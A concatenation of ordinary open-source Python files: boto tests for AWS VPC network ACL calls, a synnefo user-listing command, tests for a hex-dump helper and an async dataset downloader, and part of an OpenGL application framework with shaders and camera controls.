ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
def test_create_network_acl_icmp(self):
self.set_http_response(status_code=200)
response = self.service_connection.create_network_acl_entry(
'acl-2cb85d45', 110, 'udp', 'allow', '0.0.0.0/0', egress='true',
icmp_code=-1, icmp_type=8)
self.assert_request_parameters({
'Action': 'CreateNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 110,
'Protocol': 'udp',
'RuleAction': 'allow',
'Egress': 'true',
'CidrBlock': '0.0.0.0/0',
'Icmp.Code': -1,
'Icmp.Type': 8},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
class TestReplaceNetworkAclEntry(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<ReplaceNetworkAclEntryResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>true</return>
</ReplaceNetworkAclEntryResponse>
"""
def test_replace_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.replace_network_acl_entry(
'acl-2cb85d45', 110, 'tcp', 'deny', '0.0.0.0/0', egress=False,
port_range_from=139, port_range_to=139)
self.assert_request_parameters({
'Action': 'ReplaceNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 110,
'Protocol': 'tcp',
'RuleAction': 'deny',
'Egress': 'false',
'CidrBlock': '0.0.0.0/0',
'PortRange.From': 139,
'PortRange.To': 139},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
def test_replace_network_acl_icmp(self):
self.set_http_response(status_code=200)
response = self.service_connection.replace_network_acl_entry(
'acl-2cb85d45', 110, 'tcp', 'deny', '0.0.0.0/0',
icmp_code=-1, icmp_type=8)
self.assert_request_parameters({
'Action': 'ReplaceNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 110,
'Protocol': 'tcp',
'RuleAction': 'deny',
'CidrBlock': '0.0.0.0/0',
'Icmp.Code': -1,
'Icmp.Type': 8},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
class TestDeleteNetworkAclEntry(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<DeleteNetworkAclEntryResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>true</return>
</DeleteNetworkAclEntryResponse>
"""
def test_delete_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.delete_network_acl_entry('acl-2cb85d45', 100,
egress=False)
self.assert_request_parameters({
'Action': 'DeleteNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 100,
'Egress': 'false'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
class TestGetNetworkAclAssociations(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<DescribeNetworkAclsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAclSet>
<item>
<networkAclId>acl-5d659634</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>false</default>
<entrySet>
<item>
<ruleNumber>110</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>49152</from>
<to>65535</to>
</portRange>
</item>
</entrySet>
<associationSet>
<item>
<networkAclAssociationId>aclassoc-c26596ab</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-f0669599</subnetId>
</item>
</associationSet>
<tagSet/>
</item>
</networkAclSet>
</DescribeNetworkAclsResponse>
"""
def test_get_network_acl_associations(self):
self.set_http_response(status_code=200)
api_response = self.service_connection.get_all_network_acls()
association = api_response[0].associations[0]
self.assertEqual(association.network_acl_id, 'acl-5d659634')
if __name__ == '__main__':
unittest.main()
| mit |
konsP/synnefo | snf-astakos-app/astakos/im/management/commands/user-list.py | 10 | 4358 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from optparse import make_option
from astakos.im.models import AstakosUser
from snf_django.management.commands import ListCommand
def get_providers(user):
return ','.join(
[unicode(auth) for auth in user.auth_providers.filter(active=True)]
)
def get_groups(user):
return ','.join(user.groups.all().values_list('name', flat=True))
class Command(ListCommand):
help = "List users"
object_class = AstakosUser
FIELDS = {
'id': ('id', ('The id of the user')),
'realname': ('realname', 'The name of the user'),
'active': ('is_active', 'Whether the user is active or not'),
'verified':
('email_verified', 'Whether the user has a verified email address'),
'moderated':
('moderated', 'Account moderated'),
'admin': ('is_superuser', 'Whether the user is admin or not'),
'uuid': ('uuid', 'The uuid of the user'),
'providers': (get_providers,
'The authentication providers of the user'),
'activation_sent': ('activation_sent',
'The date activation sent to the user'),
'displayname': ('username', 'The display name of the user'),
'groups': (get_groups, 'The groups of the user'),
'last_login_details': ('last_login_info_display',
'User last login dates for each login method'),
'last_login': ('last_login', 'User last login date')
}
fields = ['id', 'displayname', 'realname', 'uuid', 'active', 'admin']
option_list = ListCommand.option_list + (
make_option('--auth-providers',
action='store_true',
dest='auth_providers',
default=False,
help="Display user authentication providers"),
make_option('--group',
action='append',
dest='groups',
default=None,
metavar="GROUP",
help="Only show users that belong to the specified"
" group. Can be used multiple times."),
make_option('--active',
action='store_true',
dest='active',
default=False,
help="Display only active users"),
make_option('--pending-moderation',
action='store_true',
dest='pending_moderation',
default=False,
help="Display unmoderated users"),
make_option('--pending-verification',
action='store_true',
dest='pending_verification',
default=False,
help="Display unverified users"),
make_option("--display-mails",
dest="displayname",
action="store_true",
default=False,
help="Display user email (enabled by default)")
)
def handle_args(self, *args, **options):
if options['active']:
self.filters['is_active'] = True
if options['pending_moderation']:
self.filters['email_verified'] = True
self.filters['moderated'] = False
if options['pending_verification']:
self.filters['email_verified'] = False
if options['groups']:
self.filters['groups__name__in'] = options['groups']
if options['auth_providers']:
self.fields.extend(['providers'])
DISPLAYNAME = 'displayname'
if options[DISPLAYNAME] and DISPLAYNAME not in self.fields:
self.fields.extend([DISPLAYNAME])
| gpl-3.0 |
dhylands/bioloid3 | tests/test_dump_mem.py | 1 | 4201 | #!/usr/bin/env python3
# This file tests the packet parser
import unittest
import binascii
from bioloid.dump_mem import dump_mem
PREFIX = ' Prefix'
class TestDumpMem(unittest.TestCase):
def clear_log(self):
self.log_lines = []
def log(self, str):
self.log_lines.append(str)
#print(str)
def test_empty_buffer(self):
self.clear_log()
dump_mem(b'', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix:No data'
])
def test_less_than_one_line(self):
self.clear_log()
dump_mem(b'0123', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 0123'
])
def test_less_than_one_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33'
])
def test_exactly_one_line(self):
self.clear_log()
dump_mem(b'0123456789ABCDEF', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF'
])
def test_exactly_one_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEF', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46'
])
def test_a_bit_more_than_a_line(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
' Prefix: 0010: 47 G'
])
def test_a_bit_more_than_a_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46',
' Prefix: 0010: 47'
])
def test_no_prefix(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', log=self.log)
self.assertEqual(self.log_lines, [
'0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'0010: 47 G'
])
def test_no_prefix_no_addr(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', show_addr=False, log=self.log)
self.assertEqual(self.log_lines, [
'30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'47 G'
])
def test_no_prefix_no_addr_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', show_addr=False, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
'30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46',
'47'
])
def test_addr(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', addr=0x1234, log=self.log)
self.assertEqual(self.log_lines, [
'1234: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'1244: 47 G'
])
def test_addr_line_width(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', addr=0x1234, line_width=8, log=self.log)
self.assertEqual(self.log_lines, [
'1234: 30 31 32 33 34 35 36 37 01234567',
'123c: 38 39 41 42 43 44 45 46 89ABCDEF',
'1244: 47 G'
])
def test_non_printable(self):
self.clear_log()
dump_mem(b'012\x00\x01\x1e\x1f456', log=self.log)
self.assertEqual(self.log_lines, [
'0000: 30 31 32 00 01 1e 1f 34 35 36 012....456',
])
def test_neg_line_width(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, line_width=-6, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
' Prefix: 0010: 47 G'
])
if __name__ == '__main__':
unittest.main()
| mit |
datasciencebr/serenata-toolbox | tests/unit/test_datasets_downloader.py | 1 | 4433 | import asyncio
import os
from concurrent.futures import TimeoutError
from unittest import TestCase
from unittest.mock import Mock, patch
from aiohttp import ClientSession
from serenata_toolbox.datasets.downloader import Downloader
class TestDownloader(TestCase):
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_init(self, exists, isdir):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test', timeout=1)
self.assertEqual(os.path.abspath('test'), downloader.target)
self.assertEqual(0, downloader.total)
self.assertEqual(1, downloader.timeout)
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_init_no_timeout(self, exists, isdir):
downloader = Downloader('test')
self.assertEqual(None, downloader.timeout)
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_init_no_existing_target(self, exists, isdir):
exists.return_value = False
isdir.return_value = True
with self.assertRaises(FileNotFoundError):
Downloader('test')
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_init_file_target(self, exists, isdir):
exists.return_value = True
isdir.return_value = False
with self.assertRaises(FileNotFoundError):
Downloader('test')
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_download_no_file(self, exists, isdir):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test')
self.assertIsNone(downloader.download(''))
self.assertIsNone(downloader.download([]))
@patch.object(Downloader, 'main')
@patch('serenata_toolbox.datasets.downloader.asyncio')
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_download_single_file(self, exists, isdir, asyncio_, main):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test')
downloader.download('test.xz')
asyncio_.get_event_loop.assert_called_with()
loop = asyncio_.get_event_loop.return_value
self.assertTrue(loop.run_until_complete.called)
main.assert_called_once_with(loop, ('test.xz',))
@patch.object(Downloader, 'main')
@patch('serenata_toolbox.datasets.downloader.asyncio')
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_download_multiple_files(self, exists, isdir, asyncio_, main):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test')
downloader.download(range(3))
asyncio_.get_event_loop.assert_called_with()
loop = asyncio_.get_event_loop.return_value
self.assertTrue(loop.run_until_complete.called)
main.assert_called_once_with(loop, (1, 2))
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_url(self, exists, isdir):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test')
expected = 'https://nyc3.digitaloceanspaces.com/serenata-de-amor-data/test.xz'
self.assertEqual(expected, downloader.url('test.xz'))
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_download_timeout(self, exists, isdir):
exists.return_value = True
isdir.return_value = True
with self.assertRaises(TimeoutError):
downloader = Downloader('test')
downloader.url = Mock(return_value="http://www.google.com:81/")
loop = asyncio.get_event_loop()
with ClientSession(loop=loop) as client:
yield from downloader.fetch_file(client, '2016-12-06-reibursements.xz')
| mit |
embisi-github/gjslib | python/gjslib/graphics/opengl_app.py | 1 | 32413 | #!/usr/bin/env python
#a Imports
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
from OpenGL.GL import shaders
import sys
import math
from gjslib.math import quaternion, matrix, vectors
import OpenGL.arrays.vbo as vbo
import numpy
#a Default shaders
shader_code={}
shader_code["standard_vertex"] = """
#version 330 core
layout(location = 0) in vec3 V_m;
layout(location = 1) in vec2 V_UV;
layout(location = 2) in vec3 N_m;
out vec2 UV;
out vec3 V_w;
out vec3 V_c;
uniform mat4 M;
uniform mat4 V;
uniform mat4 P;
void main(){
V_w = (M * vec4(V_m,1)).xyz + 0*N_m;// Use N_m or lose it...
V_c = (V * M * vec4(V_m,1)).xyz;
gl_Position = P * V * M * vec4(V_m,1);
UV = V_UV;
}
"""
shader_code["standard_fragment"] = """
#version 330 core
in vec3 V_m;
in vec2 V_UV;
in vec3 N_m;
out vec4 color;
uniform vec3 C;
void main(){
color = vec4(C,1);
}
"""
shader_code["texture_fragment"] = """
#version 330 core
in vec3 V_w;
in vec2 UV;
in vec3 V_c;
out vec3 color;
uniform sampler2D sampler;
void main(){
color = texture(sampler,UV).rgb*0.7;
}
"""
shader_code["font_fragment"] = """
#version 330 core
in vec3 V_w;
in vec2 UV;
in vec3 V_c;
out vec4 color;
uniform sampler2D sampler;
uniform vec3 C;
void main(){
color = texture(sampler,UV).r * vec4(C,1.0);
if (texture(sampler,UV).r<0.1) discard;
}
"""
#a Shader classes - move to opengl_shader
class c_opengl_shader(object):
#f __init__
def __init__(self):
pass
#f compile
def compile(self):
self.vao = glGenVertexArrays(1)
glBindVertexArray(self.vao)
self.vertex_shader = shaders.compileShader(self.vertex_src, GL_VERTEX_SHADER)
self.fragment_shader = shaders.compileShader(self.fragment_src, GL_FRAGMENT_SHADER)
self.program = shaders.compileProgram(self.vertex_shader, self.fragment_shader)
self.attrib_ids = {}
for k in self.attribs:
self.attrib_ids[k] = glGetAttribLocation(self.program,k)
pass
self.uniform_ids = {}
for k in self.uniforms:
self.uniform_ids[k] = glGetUniformLocation(self.program,k)
pass
for k in self.attrib_ids:
if self.attrib_ids[k]==-1:
raise Exception("Failed to create attribute",k)
pass
for k in self.uniform_ids:
if self.uniform_ids[k]==-1:
raise Exception("Failed to create uniform",k)
pass
pass
#f use
def use(self):
shaders.glUseProgram(self.program)
pass
#f bind_vbo
def bind_vbo(self, t=None, v=None, n=None, uv=None, **kwargs):
from ctypes import sizeof, c_float, c_void_p, c_uint
for (d,k,s) in ( (v,"V_m",3), (n,"N_m",3), (uv,"V_UV",2) ):
if d is not None and k in self.attrib_ids:
glEnableVertexAttribArray(self.attrib_ids[k])
glVertexAttribPointer(self.attrib_ids[k], s, GL_FLOAT, GL_FALSE, t*sizeof(c_float), c_void_p(d*sizeof(c_float)) )
pass
for (k,v) in kwargs.iteritems():
if k in self.uniform_ids:
if type(v)==float:
glUniformMatrix1f(self.uniform_ids[k],v)
pass
elif len(v)==3:
glUniform3f(self.uniform_ids[k],v[0],v[1],v[2])
pass
elif len(v)==4:
glUniform4f(self.uniform_ids[k],v[0],v[1],v[2],v[3])
pass
pass
pass
pass
#f set_matrices
def set_matrices(self, matrix_stacks):
glUniformMatrix4fv(self.uniform_ids["M"],1,GL_TRUE,matrix_stacks["model"][-1].get_matrix())
glUniformMatrix4fv(self.uniform_ids["V"],1,GL_TRUE,matrix_stacks["view"][-1].get_matrix())
glUniformMatrix4fv(self.uniform_ids["P"],1,GL_TRUE,matrix_stacks["project"][-1].get_matrix())
pass
#f All done
pass
#c c_opengl_shader_color_standard
class c_opengl_shader_color_standard(c_opengl_shader):
vertex_src = shader_code["standard_vertex"]
fragment_src = shader_code["standard_fragment"]
attribs = ("V_m", "V_UV", "N_m")
uniforms = ("M", "V", "P", "C")
pass
#c c_opengl_shader_texture_standard
class c_opengl_shader_texture_standard(c_opengl_shader):
vertex_src = shader_code["standard_vertex"]
fragment_src = shader_code["texture_fragment"]
attribs = ("V_m", "V_UV", "N_m")
uniforms = ("M", "V", "P")
pass
#c c_opengl_shader_font_standard
class c_opengl_shader_font_standard(c_opengl_shader):
vertex_src = shader_code["standard_vertex"]
fragment_src = shader_code["font_fragment"]
attribs = ("V_m", "V_UV", "N_m")
uniforms = ("M", "V", "P", "C")
pass
#a Class for c_opengl
#c c_opengl_app
class c_opengl_app(object):
window_title = "opengl_main"
#f __init__
def __init__(self, window_size):
self.window_size = window_size
self.display_has_errored = False
self.fonts = {}
self.display_matrices = {"model": [matrix.c_matrixNxN(order=4).identity()],
"view": [matrix.c_matrixNxN(order=4).identity()],
"project":[matrix.c_matrixNxN(order=4).identity()],
}
self.clips = []
self.selected_shader = None
self.simple_object = {}
self.simple_object["cross"] = {"vectors":vbo.VBO(data=numpy.array([1.0,0.2,0, -1.0,0.2,0, 1.0,-0.2,0, -1.0,-0.2,0,
0.2,1.0,0, 0.2,-1.0,0, -0.2,1.0,0, -0.2,-1.0,0, ],
dtype=numpy.float32), target=GL_ARRAY_BUFFER ),
"indices":vbo.VBO(data=numpy.array([0,1,2,1,2,3,4,5,6,5,6,7],
dtype=numpy.uint8), target=GL_ELEMENT_ARRAY_BUFFER ),
}
self.simple_object["diamond"] = {"vectors":vbo.VBO(data=numpy.array([1,0,0, -1,0,0, 0,1,0, 0,-1,0, 0,0,1, 0,0,-1],
dtype=numpy.float32), target=GL_ARRAY_BUFFER ),
"indices":vbo.VBO(data=numpy.array([0,2,4, 0,2,5, 0,3,4, 0,3,5,
1,2,4, 1,2,5, 1,3,4, 1,3,5],
dtype=numpy.uint8), target=GL_ELEMENT_ARRAY_BUFFER ),
}
pass
#f window_xy
def window_xy(self, xy):
return ((xy[0]+1.0)*self.window_size[0]/2, (xy[1]+1.0)*self.window_size[1]/2)
#f uniform_xy
def uniform_xy(self, xy):
return (-1.0+2*float(xy[0])/self.window_size[0], -1.0+2*float(xy[1])/self.window_size[1])
#f attach_menu
def attach_menu(self, menu, name):
glutSetMenu(menu.glut_id(name))
glutAttachMenu(GLUT_RIGHT_BUTTON)
pass
#f clip_push
def clip_push(self, x,y,w,h):
"""
Can do clipping also by giving portions of the depth buffer space to different levels; each time you push you go farther back into the depth buffer
Can do clipping using a clip volume in the fragment shader using a clip transformation (of MVP vector to clip volume - discard if outside unit cube)
Can do clipping by overwriting the depth buffer
"""
x,y,w,h = int(x),int(y),int(w),int(h)
self.clips.append((x,y,w,h))
glViewport(x,y,w,h)
glScissor(x,y,w,h)
glEnable(GL_SCISSOR_TEST)
pass
#f clip_pop
def clip_pop(self, matrix="model"):
self.clips.pop()
if len(self.clips)==0:
(x,y,w,h) = (0,0,self.window_size[0],self.window_size[1])
glDisable(GL_SCISSOR_TEST)
pass
else:
(x,y,w,h) = self.clips[-1]
pass
glViewport(x,y,w,h)
glScissor(x,y,w,h)
pass
#f matrix_push
def matrix_push(self, matrix="model"):
m = self.display_matrices[matrix][-1].copy()
self.display_matrices[matrix].append(m)
if len(self.display_matrices[matrix])>100:
raise Exception("Too many matrices pushed")
pass
#f matrix_pop
def matrix_pop(self, matrix="model"):
m = self.display_matrices[matrix].pop()
pass
#f matrix_mult
def matrix_mult(self, by, matrix="model"):
self.display_matrices[matrix][-1].postmult(by)
pass
#f matrix_scale
def matrix_scale(self, scale=1.0, matrix="model"):
if type(scale)==float:
scale = (scale,scale,scale,1.0)
pass
self.display_matrices[matrix][-1].scale(scale)
pass
#f matrix_rotate
def matrix_rotate(self, angle, axis, matrix="model"):
q = quaternion.c_quaternion.of_rotation(angle=angle, axis=axis, degrees=True)
self.display_matrices[matrix][-1].postmult(q.get_matrixn(order=4))
pass
#f matrix_translate
def matrix_translate(self, translate, matrix="model"):
self.display_matrices[matrix][-1].translate(translate)
pass
#f matrix_set
def matrix_set(self, m, matrix="project"):
self.display_matrices[matrix][-1] = m
pass
#f matrix_identity
def matrix_identity(self, matrix="model"):
self.display_matrices[matrix][-1].identity()
pass
#f matrix_perspective
def matrix_perspective(self, fovx=None, fovy=None, aspect=1.0, zNear=None, zFar=None, matrix="project"):
m = self.display_matrices[matrix][-1]
for r in range(4):
for c in range(4):
m[r,c] = 0.0
pass
pass
if fovx is None:
fy = 1/math.tan(math.radians(fovy)/2)
fx = fy/aspect
pass
else:
fx = 1/math.tan(math.radians(fovx)/2)
if fovy is None:
fy = fx*aspect
pass
else:
fy = 1/math.tan(math.radians(fovy)/2)
pass
pass
m[0,0] = fx
m[1,1] = fy
m[2,2] = (zNear+zFar)/(zNear-zFar)
m[2,3] = 2*zNear*zFar/(zNear-zFar)
m[3,2] = -1.0
pass
#f matrix_use
def matrix_use(self):
self.selected_shader.set_matrices(self.display_matrices)
pass
#f shaders_compile
def shaders_compile(self):
self.shaders = {}
self.shaders["color_standard"] = c_opengl_shader_color_standard()
self.shaders["texture_standard"] = c_opengl_shader_texture_standard()
self.shaders["font_standard"] = c_opengl_shader_font_standard()
for k in self.shaders:
self.shaders[k].compile()
pass
#f shader_set_attributes
def shader_set_attributes(self, **kwargs):
self.selected_shader.bind_vbo(**kwargs)
pass
#f shader_use
def shader_use(self,shader_name="color_standard"):
self.selected_shader = self.shaders[shader_name]
self.selected_shader.use()
pass
#f draw_simple_object
def draw_simple_object(self, obj, c, xyz, sc, angle=0, axis=(0,0,1)):
self.matrix_push()
self.matrix_translate(xyz)
self.matrix_rotate(angle, axis)
self.matrix_scale(sc)
self.matrix_use()
self.simple_object[obj]["vectors"].bind()
self.simple_object[obj]["indices"].bind()
self.shader_set_attributes( t=3, v=0, C=c )
glDrawElements(GL_TRIANGLES,len(self.simple_object[obj]["indices"]),GL_UNSIGNED_BYTE, None)
self.simple_object[obj]["vectors"].unbind()
self.simple_object[obj]["indices"].unbind()
self.matrix_pop()
pass
#f draw_lines
def draw_lines(self, line_data):
vectors = vbo.VBO(data=numpy.array(line_data, dtype=numpy.float32), target=GL_ARRAY_BUFFER )
vectors.bind()
self.shader_set_attributes(t=3, v=0)
glDrawArrays(GL_LINES,0,len(line_data))
vectors.unbind()
pass
#f init_opengl
def init_opengl(self):
glutInit(sys.argv)
glutInitDisplayMode(GLUT_3_2_CORE_PROFILE |GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)
glutInitWindowSize(self.window_size[0],self.window_size[1])
glutCreateWindow(self.window_title)
#print glGetString(GL_VERSION)
self.shaders_compile()
self.shader_use()
glClearColor(0.,0.,0.,1.)
#glShadeModel(GL_SMOOTH)
#glEnable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
self.opengl_post_init()
pass
#f opengl_post_init
def opengl_post_init(self):
"""Subclass should provide this"""
pass
#f main_loop
def main_loop(self):
glutKeyboardFunc(self.keypress_callback)
glutKeyboardUpFunc(self.keyrelease_callback)
glutMouseFunc(self.mouse_callback)
glutMotionFunc(self.motion_callback)
glutDisplayFunc(self.display_callback)
glutIdleFunc(self.idle_callback)
glutIgnoreKeyRepeat(True)
glutMainLoop()
return
#f display_callback
def display_callback(self):
if (not self.display_has_errored):
try:
self.display()
except SystemExit as e:
raise
except:
traceback.print_exc()
self.display_has_errored = True
pass
pass
pass
#f keypress_callback
def keypress_callback(self, key,x,y):
w = glutGet(GLUT_WINDOW_WIDTH)
h = glutGet(GLUT_WINDOW_HEIGHT)
y = h-y # Invert y as OpenGL want it from BL
m = glutGetModifiers()
if self.keypress(key,m,x,y):
return
if ord(key)==17: # ctrl-Q
sys.exit()
pass
#f keyrelease_callback
def keyrelease_callback(self, key,x,y):
w = glutGet(GLUT_WINDOW_WIDTH)
h = glutGet(GLUT_WINDOW_HEIGHT)
y = h-y # Invert y as OpenGL want it from BL
m = glutGetModifiers()
if self.keyrelease(key,m,x,y):
return
if ord(key)==17: # ctrl-Q
sys.exit()
pass
#f mouse_callback
def mouse_callback(self, button,state,x,y):
w = glutGet(GLUT_WINDOW_WIDTH)
h = glutGet(GLUT_WINDOW_HEIGHT)
y = h-y # Invert y as OpenGL want it from BL
m = glutGetModifiers()
b = "left"
s = "up"
if state == GLUT_UP: s="up"
if state == GLUT_DOWN: s="down"
if button == GLUT_LEFT_BUTTON: b="left"
if button == GLUT_MIDDLE_BUTTON: b="middle"
if button == GLUT_RIGHT_BUTTON: b="right"
self.mouse(b,s,m,x,y)
pass
#f motion_callback
def motion_callback(self, x,y):
w = glutGet(GLUT_WINDOW_WIDTH)
h = glutGet(GLUT_WINDOW_HEIGHT)
y = h-y # Invert y as OpenGL want it from BL
self.motion(x,y)
pass
#f idle_callback
def idle_callback(self):
self.idle()
glutPostRedisplay()
pass
#f display
def display(self):
"""
Should be provided by the subclass
"""
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
glutSwapBuffers()
pass
#f keypress
def keypress(self, k, m, x, y):
"""
Should be provided by the subclass
"""
pass
#f keyrelease
def keyrelease(self, k, m, x, y):
"""
Should be provided by the subclass
"""
pass
#f mouse
def mouse(self, b, s, m, x, y):
"""
Should be provided by the subclass
"""
pass
#f motion
def motion(self, x, y):
"""
Should be provided by the subclass
"""
pass
#f idle
def idle(self):
"""
Should be provided by the subclass
"""
pass
#f get_font
def get_font(self, fontname):
if fontname not in self.fonts:
fontname = self.fonts.keys()[0]
pass
return self.fonts[fontname]
#f load_font
def load_font(self, bitmap_filename):
import numpy
from gjslib.graphics.font import c_bitmap_font
bf = c_bitmap_font()
bf.load(bitmap_filename)
png_data = numpy.array(list(bf.image.getdata()), numpy.uint8)
texture = glGenTextures(1)
glPixelStorei(GL_UNPACK_ALIGNMENT,1)
glBindTexture(GL_TEXTURE_2D, texture)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_MIRRORED_REPEAT)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_MIRRORED_REPEAT)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexImage2D(GL_TEXTURE_2D, 0, GL_R8, bf.image_size[0], bf.image_size[1], 0, GL_RED, GL_UNSIGNED_BYTE, png_data)
glFlush()
self.fonts[bf.fontname] = (bf, texture)
return bf
#f debug
def debug(self, reason, options=None):
print "*"*80
print "opengl_app.debug",reason
print "*"*80
print self.clips
print self.display_matrices["project"][-1]
print self.display_matrices["view"][-1]
print self.display_matrices["model"][-1]
pass
#f All done
pass
#c c_opengl_camera_app
class c_opengl_camera_app(c_opengl_app):
camera_control_keys = { "x":(("roll",1,0),),
"z":(("roll",2,0),),
"s":(("pitch",1,0),),
"a":(("pitch",2,0),),
".":(("yaw",1,0),),
";":(("yaw",2,0),),
"[":(("fov",1,0),),
"]":(("fov",2,0),),
"/":(("speed",1,0),),
"'":(("speed",2,0),),
" ":(("roll",0,-1),("yaw",0,-1),("pitch",0,-1),("speed",4,3),),
}
#f __init__
def __init__(self, **kwargs):
c_opengl_app.__init__(self, **kwargs)
self.camera = {"position":[0,0,-10],
"facing":quaternion.c_quaternion.identity(),
"rpy":[0,0,0],
"speed":0,
"fov":90,
}
self.mvp = None
self.aspect = 1.0
self.zNear=1.0
self.zFar=40.0
self.camera_controls = set()
self.camera_quats = {("roll",1):quaternion.c_quaternion.roll(+0.002),
("roll",2):quaternion.c_quaternion.roll(-0.002),
("yaw",1):quaternion.c_quaternion.yaw(+0.002),
("yaw",2):quaternion.c_quaternion.yaw(-0.002),
